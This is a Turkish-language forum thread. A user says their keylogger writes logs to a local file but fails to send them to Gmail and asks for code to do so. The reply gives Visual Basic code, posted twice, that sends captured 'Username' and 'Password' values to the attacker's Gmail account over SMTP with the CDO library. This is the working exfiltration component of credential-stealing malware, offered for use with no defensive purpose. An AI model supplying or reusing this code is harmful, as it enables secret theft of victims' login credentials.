Beyler Benim Logger Logları "C:/Keylogger.txt" Olarak Kaydediyor Fakat Gmaile Yollamıyor Hangi Kodla Yollarım Bendeki Kod Hatalı Sanırım
Follow along with the video below to see how to install our site as a web app on your home screen.
Not: This feature may not be available in some browsers.
Dim iMsg, iConf, Flds Set iMsg = CreateObject("CDO.Message") Set iConf = CreateObject("CDO.Configuration") Set Flds = iConf.Fields schema = "http://schemas.microsoft.com/cdo/configuration/" Flds.Item(schema & "sendusing") = 2 Flds.Item(schema & "smtpserver") = "smtp.gmail.com" Flds.Item(schema & "smtpserverport") = 465 Flds.Item(schema & "smtpauthenticate") = 1 Flds.Item(schema & "sendusername") = "gmailadresin" Flds.Item(schema & "sendpassword") = "şifren" Flds.Item(schema & "smtpusessl") = 1 Flds.Update With iMsg .To = "gmailadresin" .From = "başkabirgmailadresiyaz" .Subject = "Log Bilgi" .HTMLbOdy = "Username : " & Text1.Text & vbCrLf & vbCrLf & "Password : " & Text2.Text .Organization = "Mail Organtion" .ReplyTo = "-" Set .Configuration = iConf SendEmailGmail = .Send End With
Buyrun
Kod:Dim iMsg, iConf, Flds Set iMsg = CreateObject("CDO.Message") Set iConf = CreateObject("CDO.Configuration") Set Flds = iConf.Fields schema = "http://schemas.microsoft.com/cdo/configuration/" Flds.Item(schema & "sendusing") = 2 Flds.Item(schema & "smtpserver") = "smtp.gmail.com" Flds.Item(schema & "smtpserverport") = 465 Flds.Item(schema & "smtpauthenticate") = 1 Flds.Item(schema & "sendusername") = "gmailadresin" Flds.Item(schema & "sendpassword") = "şifren" Flds.Item(schema & "smtpusessl") = 1 Flds.Update With iMsg .To = "gmailadresin" .From = "başkabirgmailadresiyaz" .Subject = "Log Bilgi" .HTMLbOdy = "Username : " & Text1.Text & vbCrLf & vbCrLf & "Password : " & Text2.Text .Organization = "Mail Organtion" .ReplyTo = "-" Set .Configuration = iConf SendEmailGmail = .Send End With